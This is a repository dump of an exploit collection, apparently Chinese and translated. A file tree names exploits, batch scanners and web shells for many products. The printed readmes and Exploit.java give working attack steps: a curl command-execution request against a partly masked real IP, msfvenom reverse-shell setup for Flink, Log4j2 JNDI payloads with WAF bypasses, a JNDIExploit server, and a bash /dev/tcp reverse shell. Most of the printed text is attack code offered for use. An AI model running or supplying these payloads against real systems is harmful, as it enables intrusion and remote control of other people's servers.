├── .gitignore
├── Apache
│   ├── Apache APISIX Dashboard未授权导入配置文件RCE漏洞(CVE-2021-45232)
│   │   ├── apisix-dashboard-rce-batch-detect.py
│   │   └── readme.md
│   ├── Apache ActiveMQ POC
│   │   └── readme.md
│   ├── Apache Flink任意jar包上传漏洞(暂无编号)
│   │   ├── 0.png
│   │   ├── 1.png
│   │   ├── 2.png
│   │   ├── 3.png
│   │   ├── 4.png
│   │   └── readme.md
│   ├── Apache Log4j2 RCE漏洞复现(CVE-2021-44228)
│   │   ├── Exploit.java
│   │   ├── pic
│   │   │   ├── Lookups.png
│   │   │   ├── calc.png
│   │   │   └── mindmap.png
│   │   └── readme.md
│   ├── Apache Log4j2 RCE靶场复现(CVE-2021-44228)
│   │   ├── image
│   │   │   ├── 01.png
│   │   │   ├── 02.png
│   │   │   └── 03.png
│   │   └── readme.md
│   ├── Apache Shiro POC
│   │   └── readme.md
│   ├── Apache Solr远程代码执行漏洞(CVE-2019-12409)
│   │   ├── 1.png
│   │   ├── 2.png
│   │   └── readme.md
│   ├── Apache Spark远程命令执行漏洞(暂无编号)
│   │   ├── Exploit.jar
│   │   ├── pic
│   │   │   ├── 1.png
│   │   │   └── readme.md
│   │   └── readme.md
│   └── Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)
│       ├── pic
│       │   ├── 1.png
│       │   ├── 2.png
│       │   └── readme.md
│       └── readme.md
├── Atlassian
│   ├── Atlassian Confluence远程代码执行漏洞(CVE-2021-26084)
│   │   ├── pic
│   │   │   ├── 1.png
│   │   │   └── readme.md
│   │   └── readme.md
│   └── Atlassian Jira POC
│       ├── Unauthenticated_JIRA_CVEs_to_Exploit.txt
│       ├── Unauthenticated_JIRA_CVEs_to_Exploit.xmind
│       └── readme.md
├── Citrix
│   ├── Citrix XenMobile目录遍历漏洞(CVE-2020-8209)
│   │   ├── 0.png
│   │   ├── 1.png
│   │   └── readme.md
│   └── Citrix远程代码执行漏洞(CVE-2019-19781)
│       ├── 0.png
│       ├── CVE-2019-19781.zip
│       └── readme.md
├── D-Link
│   └── D-Link DCS系列监控摄像机账号密码泄露漏洞(CVE-2020-25078)
│       ├── pic
│       │   ├── 0.png
│       │   └── readme.md
│       └── readme.md
├── Discuz
│   └── Discuz 7.x 6.x全局变量防御绕过导致远程代码执行漏洞(暂无编号)
│       ├── 0.png
│       └── readme.md
├── Drupal
│   └── Drupal远程代码执行漏洞(CVE-2018-7600)
│       ├── 0.png
│       ├── drupalggedon2.rb
│       └── readme.md
├── Fastjson
│   └── Fastjson漏洞集合.md
├── GeoServer
│   └── GeoServer CVE-2024-36401漏洞复现及武器化
│       ├── GeoServer CVE-2024-36401漏洞复现及武器化.md
│       └── images
│           ├── 01.png
│           ├── 02.png
│           ├── 03.png
│           ├── 04.png
│           ├── 05.png
│           ├── 06.png
│           └── 07.png
├── Git
│   └── Git泄漏漏洞(暂无编号)
│       ├── 0.png
│       ├── 1.png
│       ├── GitHack-master.zip
│       └── readme.md
├── GitLab
│   └── GitLab exiftool未授权远程命令执行漏洞(CVE-2021-22205)
│       ├── pic
│       │   ├── 1.png
│       │   ├── 2.png
│       │   ├── 3.png
│       │   ├── 4.png
│       │   ├── 5.png
│       │   ├── a.png
│       │   └── readme.md
│       └── readme.md
├── Google
│   ├── Google Chrome 0day漏洞(暂无编号)
│   │   ├── exploit.html
│   │   ├── pic
│   │   │   ├── 0.png
│   │   │   ├── 1.png
│   │   │   └── readme.md
│   │   └── readme.md
│   └── Google Chrome 0day配合微信钓鱼实现CS上线漏洞(暂无编号)
│       ├── pic
│       │   ├── 0.png
│       │   ├── 1.png
│       │   ├── 2.png
│       │   └── readme.md
│       ├── readme.md
│       └── wechat-exploit.html
├── JBOSS
│   ├── JBoss漏洞集合.md
│   └── pic
│       └── 01.png
├── JDWP
│   └── JDWP远程代码执行漏洞(暂无编号)
│       ├── pic
│       │   ├── 1.png
│       │   └── readme.md
│       └── readme.md
├── JumpServer
│   ├── JumpServer任意用户密码重置(CVE-2023-42820)
│   │   ├── 01.png
│   │   └── JumpServer任意用户密码重置(CVE-2023-42820).md
│   └── JumpServer远程代码执行漏洞(暂无编号)
│       ├── 0.png
│       ├── a0.png
│       ├── a1.png
│       ├── jumpserver-rce.py
│       ├── quick_start.sh
│       └── readme.md
├── Jupyter Notebook
│   └── Jupyter Notebook未授权访问导致RCE漏洞(暂无编号)
│       ├── 0.png
│       ├── 1.png
│       └── readme.md
├── Kubernetes
│   └── Kubernetes容器逃逸漏洞(CVE-2022-0185)【记录】
│       └── readme.md
├── Microsoft
│   ├── Microsoft IIS6.0远程代码执行漏洞(CVE-2017-7269)
│   │   └── readme.md
│   ├── Microsoft RDP远程代码执行漏洞(CVE-2019-0708)
│   │   ├── cve_2019_0708_bluekeep.rb
│   │   ├── cve_2019_0708_bluekeep_rce.rb
│   │   ├── rdp.rb
│   │   ├── rdp_scanner.rb
│   │   └── readme.md
│   ├── Microsoft SharePoint漏洞集合.md
│   └── Microsoft Word远程代码执行漏洞(CVE-2021-40444)
│       ├── document.docx
│       ├── pic
│       │   ├── 1.png
│       │   └── readme.md
│       └── readme.md
├── Moeditor
│   └── Moeditor 0.2.0 XSS到任意文件读取漏洞(暂无编号)
│       ├── pic
│       │   ├── 0.png
│       │   ├── 1.png
│       │   ├── 2.png
│       │   ├── 3.png
│       │   ├── 4.png
│       │   ├── 5.png
│       │   ├── a.png
│       │   └── readme.md
│       └── readme.md
├── PHPMailer
│   └── PHPMailer远程命令执行漏洞(CVE-2016-10033)
│       ├── 0.png
│       └── readme.md
├── PHPStudy
│   └── PHPStudy后门漏洞(暂无编号)
│       ├── 0.png
│       ├── 1.png
│       └── readme.md
├── PHPUnit
│   └── PHPUnit远程代码执行漏洞(CVE-2017-9841)
│       ├── 0.png
│       ├── 1.png
│       └── readme.md
├── PHP内置服务器
│   ├── 01.png
│   └── PHP源码读取漏洞复现.md
├── README.assets
│   ├── awvs.png
│   ├── goby.png
│   └── xray.png
├── README.md
├── Redis
│   └── Redis RCE复现及简单分析(CVE-2022-0543)
│       ├── pic
│       │   └── 01.png
│       └── readme.md
├── SonicWall
│   └── SonicWall SSL-VPN远程命令执行漏洞(暂无编号)
│       ├── 0.png
│       ├── 1.png
│       ├── batch-detect.py
│       ├── readme.md
│       └── urls.txt
├── Spring
│   ├── Spring Cloud Gateway SpEL Remote Code Execution(CVE-2022-22947)
│   │   ├── cve-2022-22947.py
│   │   ├── image
│   │   │   ├── 01.png
│   │   │   └── 02.png
│   │   └── readme.md
│   └── Spring Core RCE 0day漏洞复现
│       ├── pic
│       │   ├── 01.png
│       │   ├── 02.png
│       │   └── 03.png
│       └── readme.md
├── Struts2
│   ├── Struts2 S2-045远程代码执行漏洞(CVE-2017-5638)
│   │   ├── pic
│   │   │   ├── 1.png
│   │   │   └── readme.md
│   │   └── readme.md
│   └── Struts2 S2-061远程代码执行漏洞(CVE-2020-17530)
│       ├── 0.png
│       ├── 1.png
│       ├── 2.png
│       ├── 3.png
│       ├── 4.png
│       ├── 5.png
│       ├── 6.png
│       ├── readme.md
│       ├── s2-061-batch-detect-exp.py
│       └── s2-061-batch-detect.py
├── Supervisord
│   └── Supervisord远程代码执行漏洞(CVE-2017-11610)
│       ├── 0.png
│       ├── poc.py
│       └── readme.md
├── ThinkPHP
│   ├── OneThink前台登录绕过.md
│   ├── ThinkAdmin列目录及任意文件读取漏洞(CVE-2020-25540)
│   │   ├── 0.png
│   │   ├── 1.png
│   │   ├── 2.png
│   │   └── readme.md
│   ├── ThinkCMF远程代码执行漏洞(暂无编号)
│   │   ├── 0.png
│   │   ├── 1.png
│   │   ├── ThinkCMFX_2.2.3.zip
│   │   └── readme.md
│   ├── ThinkPHP 3.2.x远程代码执行
│   │   ├── image
│   │   │   ├── 01.png
│   │   │   ├── 02.png
│   │   │   ├── 03.png
│   │   │   └── 04.png
│   │   └── readme.md
│   └── ThinkPHP远程命令执行漏洞(暂无编号)
│       ├── 0.png
│       ├── readme.md
│       └── thinkphp版本总结.txt
├── Tomcat
│   ├── Tomcat AJP本地文件包含漏洞(CNVD-2020-10487)
│   │   ├── pic
│   │   │   ├── 1.png
│   │   │   └── readme.md
│   │   └── readme.md
│   ├── Tomcat JmxRemoteLifecycleListener远程代码执行漏洞(CVE-2016-8735)
│   │   ├── a0.png
│   │   ├── a1.png
│   │   ├── a2.png
│   │   ├── a3.png
│   │   ├── a4.png
│   │   ├── catalina-jmx-remote.jar
│   │   ├── groovy-2.3.9.jar
│   │   └── readme.md
│   ├── Tomcat WebSocket拒绝服务漏洞(CVE-2020-13935)
│   │   ├── WebSocketClient.js
│   │   ├── WebSocketServlet.java
│   │   ├── a.png
│   │   ├── a0.png
│   │   ├── a1.png
│   │   ├── a2.png
│   │   ├── a3.png
│   │   ├── b.png
│   │   ├── c.png
│   │   ├── d.png
│   │   ├── e.png
│   │   ├── f.png
│   │   ├── readme.md
│   │   └── tcdos
│   └── Tomcat任意文件写入漏洞(CVE-2017-12615)
│       ├── f0.png
│       ├── f1.png
│       └── readme.md
├── VMWare
│   ├── VMWare vCenter Server后利用
│   │   └── readme.md
│   ├── VMware ESXi CVE-2024-37085
│   │   └── VMware ESXi CVE-2024-37085漏洞验证分析.html
│   ├── VMware vCenter Server未授权文件上传导致RCE漏洞(CVE-2021-21972)
│   │   ├── Sp4ce
│   │   │   ├── CVE-2021-21972
│   │   │   │   ├── CVE-2021-21972.py
│   │   │   │   ├── README.md
│   │   │   │   ├── img
│   │   │   │   │   ├── 1.png
│   │   │   │   │   ├── 2.png
│   │   │   │   │   └── 3.png
│   │   │   │   └── payload
│   │   │   │       ├── Linux.tar
│   │   │   │       ├── Linux
│   │   │   │       │   └── shell.jsp
│   │   │   │       └── Windows.tar
│   │   │   └── start.sh
│   │   ├── horizon3ai
│   │   │   ├── CVE-2021-21972
│   │   │   │   ├── CVE-2021-21972-Unix-Proof.png
│   │   │   │   ├── CVE-2021-21972-Windows-Proof.png
│   │   │   │   ├── CVE-2021-21972.py
│   │   │   │   ├── LICENSE
│   │   │   │   ├── README.md
│   │   │   │   ├── Windows-Exec.png
│   │   │   │   └── cmdjsp.jsp
│   │   │   ├── exploit.tar
│   │   │   └── start-for-unix.sh
│   │   ├── pic
│   │   │   ├── 0.png
│   │   │   ├── 1.png
│   │   │   ├── 2.png
│   │   │   ├── 3.png
│   │   │   ├── 4.png
│   │   │   └── readme.md
│   │   ├── readme.md
│   │   └── vCenter任意文件上传-batch-detect.py
│   └── VMware vCenter Server远程代码执行(CVE-2015-2342)【记录】
│       ├── readme.md
│       └── 版本比对表备份
│           ├── Build numbers and versions of VMware ESXi_ESX (2143832).html
│           └── Build numbers and versions of VMware ESXi_ESX (2143832)_files
├── Weblogic
│   ├── WebLogic后台命令执行漏洞(CVE-2021-2109)
│   │   ├── 0.png
│   │   └── readme.md
│   ├── Weblogic前台验证绕过+后台命令执行漏洞复现(CVE-2020-14882、CVE-2020-14883)
│   │   └── readme.md
│   └── Weblogic前台验证绕过漏洞复现(CVE-2020-14750)
│       └── readme.md
├── Webmin
│   └── Webmin远程命令执行漏洞(CVE-2019-15107)
│       ├── 0.png
│       ├── 1.png
│       └── readme.md
├── XMind
│   └── XMind 2020 XSS漏洞(暂无编号)
│       ├── pic
│       │   ├── a0.png
│       │   └── readme.md
│       └── readme.md
├── Zabbix
│   └── Zabbix SAML SSO Login Bypass(CVE-2022-23131)
│       ├── pic
│       │   └── 1.png
│       ├── readme.md
│       └── 【利用脚本】Zabbix凭证绕过捅漂亮国菊花.html
├── 亿邮
│   └── 亿邮远程命令执行漏洞(CNVD-2021-26422)
│       ├── EYouMailRCE-Batch-Detect.py
│       ├── pic
│       │   ├── 0.png
│       │   ├── 1.png
│       │   └── readme.md
│       └── readme.md
├── 向日葵
│   └── 向日葵 RCE漏洞(CNVD-2022-10270、CNVD-2022-03672)
│       ├── image
│       │   ├── 01.png
│       │   ├── 02.png
│       │   └── 03.png
│       └── readme.md
├── 天擎
│   ├── 360天擎SQL注入漏洞(暂无编号)
│   │   ├── 360天擎-SQL注入-Vuln-Batch-Detect.py
│   │   ├── pic
│   │   │   ├── 0.png
│   │   │   └── readme.md
│   │   └── readme.md
│   ├── 360天擎越权访问导致数据库信息泄露漏洞(暂无编号)
│   │   ├── 360天擎-越权访问导致数据库信息泄露-Vuln-Batch-Detect.py
│   │   ├── pic
│   │   │   ├── 0.png
│   │   │   ├── 1.png
│   │   │   └── readme.md
│   │   └── readme.md
│   └── X擎Getshell后登录后台技巧.pdf
├── 帆软
│   └── FineReport漏洞集合.md
├── 微信
│   └── 微信绕过“请在微信客户端打开链接”限制漏洞(暂无编号)
│       ├── 0.png
│       ├── 1.png
│       ├── 2.png
│       ├── 3.png
│       ├── 4.png
│       └── readme.md
├── 泛微
│   └── 泛微OA漏洞集合.md
├── 深信服
│   └── 深信服应用报表交付系统-漏洞利用WAF绕过.md
├── 用友
│   ├── 用友NC目录遍历漏洞(暂无编号)
│   │   ├── pic
│   │   │   ├── 0.png
│   │   │   ├── 1.png
│   │   │   └── readme.md
│   │   ├── readme.md
│   │   └── 用友NC-FileRead-Vuln-Batch-Detect.py
│   └── 用友NC远程命令执行漏洞(CNVD-2021-30167)
│       ├── YonYouNC-vuln-scan.py
│       └── readme.md
├── 网康
│   └── 网康NS-NGFW前台RCE漏洞(暂无编号)
│       ├── pic
│       │   ├── 0.png
│       │   ├── 1.png
│       │   ├── 2.png
│       │   └── readme.md
│       ├── readme.md
│       └── 网康NS-NGFW-RCE-Batch-Detect.py
├── 蓝凌
│   └── 蓝凌OA漏洞集合.md
├── 通达
│   ├── 通达OA前台任意用户登录漏洞(暂无编号)
│   │   ├── pic
│   │   │   ├── 01.png
│   │   │   └── 02.png
│   │   └── readme.md
│   └── 通达OA未授权访问+文件上传导致RCE漏洞(暂无编号)
│       ├── 0.png
│       └── readme.md
├── 锐捷
│   └── 锐捷RG-UAC统一上网行为管理审计系统信息泄露漏洞(暂无编号)
│       └── readme.md
└── 齐治
    └── 奇治堡垒机任意用户登录漏洞(暂无编号)
        ├── pic
        │   ├── 0.png
        │   ├── 1.png
        │   └── readme.md
        ├── readme.md
        └── 齐治堡垒机-任意用户登录-Vuln-Batch-Detect.py

/.gitignore:
--------------------------------------------------------------------------------
.DS_Store
--------------------------------------------------------------------------------
/Apache/Apache APISIX Dashboard未授权导入配置文件RCE漏洞(CVE-2021-45232)/readme.md:
--------------------------------------------------------------------------------

### FOFA
title="Apache APISIX Dashboard"

### Detection
The tool supports single-target and batch detection; see the tool itself for usage.

### Exploitation
Note: the port used during exploitation is 9080, not 9000.
curl http://114.67.xx.xx:9080/4ra7NZ -H "cmd: ls -alh"
--------------------------------------------------------------------------------
/Apache/Apache ActiveMQ POC/readme.md:
--------------------------------------------------------------------------------
# Arbitrary file write to getshell (CVE-2016-3088)
```
The following endpoints must be reachable
/admin
/api
fileserver
```

# References
https://www.freebuf.com/vuls/284919.html
--------------------------------------------------------------------------------
/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/0.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/0.png
--------------------------------------------------------------------------------
/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/1.png
--------------------------------------------------------------------------------
/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/2.png
--------------------------------------------------------------------------------
/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/3.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/3.png
--------------------------------------------------------------------------------
/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/4.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/4.png
--------------------------------------------------------------------------------
/Apache/Apache Flink任意jar包上传漏洞(暂无编号)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Reproduction environment
Environment used: locally built environment
Version reproduced: Flink 1.9.1

# 0x01 Environment setup
Target environment: centos7_x64_en-us + flink-1.9.1-bin-scala_2.11.tgz + openjdk version "1.8.0_181"

wget https://archive.apache.org/dist/flink/flink-1.9.1/flink-1.9.1-bin-scala_2.11.tgz
tar -xvf ./flink-1.9.1-bin-scala_2.11.tgz
cd ./flink-1.9.1/bin/
./start-cluster.sh
Check whether port 8081 is open, as shown below
![image](./0.png)
Open it in a browser; the page shown below means the cluster started successfully
![image](./1.png)

# 0x02 Exploitation prerequisites
None

# 0x03 Affected versions
Flink <= 1.9.1

# 0x04 Vulnerability reproduction
Attacker environment: kali2020 + msf5

msfvenom -p java/meterpreter/reverse_tcp lhost=172.16.35.128 lport=9999 -o text.jar
msfconsole
use exploit/multi/handler
set payload java/meterpreter/reverse_tcp
set lhost 172.16.35.128
set lport 9999
run
Open http://172.16.35.131:8081/ in a browser and click where shown below
![image](./2.png)
Then click where shown below
![image](./3.png)
At this point meterpreter has received a session, as shown below
![image](./4.png)

# 0x05 Pitfalls
None

# 0x06 References
None
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/Exploit.java:
--------------------------------------------------------------------------------
import java.io.BufferedReader;
import java.io.IOException;
import java.io.InputStream;
import java.io.InputStreamReader;
import java.io.Reader;

// Demo payload class used in this reproduction: when the class is loaded,
// the constructor runs "calc" and relays the process output to stdout.
public class Exploit {

    public Exploit() throws IOException, InterruptedException {
        String cmd = "calc";
        final Process process = Runtime.getRuntime().exec(cmd);
        printMessage(process.getInputStream());
        printMessage(process.getErrorStream());
        int value = process.waitFor();
        System.out.println(value);
    }

    // Drain one of the process streams on its own thread so the process
    // cannot block on a full stdout/stderr buffer.
    private static void printMessage(final InputStream input) {
        new Thread(new Runnable() {
            @Override
            public void run() {
                Reader reader = new InputStreamReader(input);
                BufferedReader bf = new BufferedReader(reader);
                String line = null;
                try {
                    while ((line = bf.readLine()) != null) {
                        System.out.println(line);
                    }
                } catch (IOException e) {
                    e.printStackTrace();
                }
            }
        }).start();
    }

}
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/Lookups.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/Lookups.png
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/calc.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/calc.png
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/mindmap.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/pic/mindmap.png
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE漏洞复现(CVE-2021-44228)/readme.md:
--------------------------------------------------------------------------------
### 0x01 Vulnerability principle
A brief summary in my own words.
When Log4j2 writes output to the log, besides the usual variable substitution it also supports fetching remote content; fetching remote content is provided by the Lookups feature.
```
# variable substitution
logger.info("user name: {}, alias name: {}", userName, aliasName)
```
Remote content can be fetched through several kinds of lookup, one of which is JNDI, as shown below
![image](./pic/Lookups.png)
JNDI is, put simply, a dictionary-like data set: pass in a name and get the corresponding object back. JNDI also has a dangerous feature: it can fetch a remote class, or the address of a remote class, load it locally and execute it through a classloader. If a user passes in an address that contains a malicious class, the server ends up executing malicious code. Concrete exploitation depends on the protocols JNDI supports; JNDI supports four protocols, LDAP, RMI, CORBA and DNS. The exploitation approach is shown below
![image](./pic/mindmap.png)


### 0x02 Vulnerability reproduction
1. javac.exe .\Exploit.java
2. python3.exe -m http.server 8800
3. java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer http://127.0.0.1:8800/#Exploit

4. The result is shown below
![image](./pic/calc.png)

### References
https://zhuanlan.zhihu.com/p/445646703h
https://drun1baby.github.io/2022/07/28/Java反序列化之JNDI学习/
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/01.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/01.png
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/02.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/02.png
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/03.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/image/03.png
--------------------------------------------------------------------------------
/Apache/Apache Log4j2 RCE靶场复现(CVE-2021-44228)/readme.md:
--------------------------------------------------------------------------------
### 0x01 WAF bypass principle
The previous reproduction write-up covered the vulnerability principle; this range reproduction first covers the WAF bypass principle. First, note that from 2.15.0-rc1 the Lookups feature is disabled by default and has to be enabled in the configuration before any of these bypasses apply, so they are of little significance there; from 2.16.0 the Lookups feature was removed. In the affected versions, 2.0-beta9 <= version <= 2.14.1, WAFs mostly block keywords such as jndi, which can be bypassed in the following ways
```
:- is an assignment keyword: if the program processes a string like ${aaaa:-bbbb}, the result will be bbbb. Using this feature, the following WAF bypass can be built
logg.info("${${::-J}ndi:ldap://127.0.0.1:1389/Calc}");


Besides jndi, Lookups also include upper, lower and similar, which change case, so the following WAF bypasses can be built
logg.info("${${lower:J}ndi:ldap://127.0.0.1:1389/Calc}");
logg.info("${${upper:j}ndi:ldap://127.0.0.1:1389/Calc}");


Case-conversion quirks of some special characters can also be used
ı => upper => i (works in Java testing)
ſ => upper => S (works in Java testing)
İ => upper => i (does not work in Java testing)
K => upper => k (does not work in Java testing)
logg.error("${jnd${upper:ı}:ldap://127.0.0.1:1389/Calc}");


Much data is now transferred as JSON, so we can also try inside JSON
Jackson and fastjson have unicode and hex encoding features, so encoding bypasses can be tried
{"key":"\u0024\u007b"}
{"key":"\x24\u007b"}
```

### 0x02 Range reproduction
I wanted to follow this article to reproduce a Log4j2 reverse shell
https://blog.csdn.net/m0_56773673/article/details/122300927

I originally wanted to use the vulfocus online range (vulfocus/log4j2-rce-2021-12-09:1), but after the environment started, every time I sent the payload the environment crashed. When it finally stopped crashing, putting the payload in a GET request returned 400 and putting it in a POST request returned 405. Exhausting. I decided to build the environment from the reproduction article myself instead
See: https://blog.csdn.net/weixin_47019868/article/details/122010972

On Kali, apt update was extremely slow, so I updated the sources first
See: https://blog.csdn.net/qq_33331244/article/details/114656949

docker pull vulfocus/log4j2-rce-2021-12-09 was very slow and still had not finished after a long wait. Then it occurred to me that it might be the Docker registry mirror; after changing the mirror, the pull finished in under a minute
For changing the mirror see: https://blog.csdn.net/qq_29924795/article/details/104483435

After building the environment locally, I found it was the same as the online range, not the one in the article. Did the Docker image get upgraded? Damn..

The environment is what it is; let's think about how to deliver the payload. Payload in a GET request returns 400, payload in a POST request returns 405, still no good. I looked up how others attack this vulfocus range and suddenly found that the payload does go in the GET request, but it needs to be URL-encoded. How did I forget URL encoding? My brain is slow today
See: https://blog.csdn.net/weixin_45632448/article/details/124149561

I quickly switched to the URL-encoded form and tested; still no good, and after several tries still nothing. Then it occurred to me: maybe the local Docker image has no outbound network? Inside the container I found all sorts of commands stripped out. Exhausting again..

Let me try the online range again; if the online range works, the problem should be that the local Docker image cannot reach the internet. I started the online range, sent the payload, and the DNS platform received the request. Oh my, it finally works
![image](./image/01.png)

After all that, I ended up using the online range anyway... but it was fine, I learned a lot along the way

Tested: the following three payload forms all work
```
${jndi:ldap://de63d35d.dns.1433.eu.org/ttt}
${jndi:ldap://de63d35d.dns.1433.eu.org/}
${jndi:ldap://de63d35d.dns.1433.eu.org}
```

Next, try executing a command. On the server side run
```
java -jar JNDIExploit-1.2-SNAPSHOT.jar -i 0.0.0.0 -l 1389 -p 3456
```
JNDIExploit-1.2-SNAPSHOT.jar here is a modified build (you can also use: [https://github.com/welk1n/JNDI-Injection-Exploit](https://github.com/welk1n/JNDI-Injection-Exploit))

For the payload use the following (this one echoes output)
```
${jndi:ldap://0.0.0.0:1389/TomcatBypass/TomcatEcho}
```
and add an HTTP header
```
WWW-Authenticate: whoami
```
The command executed successfully, as shown
![image](./image/02.png)

Try a reverse shell
```
WWW-Authenticate: bash -c 'exec bash -i &>/dev/tcp/0.0.0.0/1234 <&1'
```
The shell came back successfully, as shown
![image](./image/03.png)

If you have the energy, also look at these two Log4j2 range and vulnerability reproductions:
https://buaq.net/go-111996.html
https://www.cnblogs.com/CHOSEN1-Z13/p/16001961.html

The tool JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar is easier to use (https://github.com/welk1n/JNDI-Injection-Exploit)
See this blog: https://www.cnblogs.com/CHOSEN1-Z13/p/16001961.html

### References
https://www.freebuf.com/articles/web/341857.html
https://www.freebuf.com/articles/web/344076.html
https://nosec.org/home/detail/4920.html
--------------------------------------------------------------------------------
/Apache/Apache Shiro POC/readme.md:
--------------------------------------------------------------------------------
Can be detected with j1anFen's tool, at: https://github.com/j1anFen/shiro_attack

Or with feihong's tool, at: https://github.com/feihong-cs/ShiroExploit-Deprecated/
--------------------------------------------------------------------------------
/Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/1.png
--------------------------------------------------------------------------------
/Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/2.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/2.png
--------------------------------------------------------------------------------
/Apache/Apache Solr远程代码执行漏洞(CVE-2019-12409)/readme.md:
--------------------------------------------------------------------------------
# 0x00 Reproduction environment
Environment used: locally built environment
Version reproduced: Solr 8.2.0

# 0x01 Environment setup
Target environment: centos7_x64_en-us + solr-8.2.0.tgz + openjdk version "1.8.0_181"
wget https://archive.apache.org/dist/lucene/solr/8.2.0/solr-8.2.0.tgz
tar -xvf ./solr-8.2.0.tgz
cd ./solr-8.2.0/bin/
./solr start -force   # listens on port 8983 by default
After starting, open http://127.0.0.1:8983/ in a browser; the page shown below means the environment is ready:
![image](./1.png)

# 0x02 Exploitation prerequisites
None

# 0x03 Affected versions
Solr 8.1.1
Solr 8.2.0

# 0x04 Vulnerability reproduction
Attacker environment: kali2020 + msf5
msfconsole
use exploit/multi/misc/java_jmx_server
set rhosts 172.16.35.138
set rport 18983
run
![image](./2.png)

# 0x05 Pitfalls
Pitfall 1:
With the vulnerable environment built on Kali, run failed repeatedly. On inspection, Kali's Java was openjdk version "11.0.6" 2020-01-14, so I suspected the Java version was too high and caused the failure; I rebuilt solr-8.2.0.zip on ubuntu16.04_x64_en-us with Java 8 and exploitation succeeded. I have seen articles where others succeeded on Java 10 as well, so I suspect the exp only works on Java 10 and below.
Pitfall 2:
CentOS 7 enables the firewall by default; stop it temporarily with "systemctl stop firewalld"

# 0x06 References
https://github.com/jas502n/CVE-2019-12409
--------------------------------------------------------------------------------
/Apache/Apache Spark远程命令执行漏洞(暂无编号)/Exploit.jar:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Spark远程命令执行漏洞(暂无编号)/Exploit.jar
--------------------------------------------------------------------------------
/Apache/Apache Spark远程命令执行漏洞(暂无编号)/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache Spark远程命令执行漏洞(暂无编号)/pic/1.png
--------------------------------------------------------------------------------
/Apache/Apache Spark远程命令执行漏洞(暂无编号)/pic/readme.md:
--------------------------------------------------------------------------------

--------------------------------------------------------------------------------
/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/1.png:
--------------------------------------------------------------------------------
https://raw.githubusercontent.com/ybdt/exp-hub/cdb6c460c0a611edb7e86f5065f1723638f2a3fb/Apache/Apache httpd路径遍历及RCE漏洞(CVE-2021-41773)/pic/1.png
--------------------------------------------------------------------------------
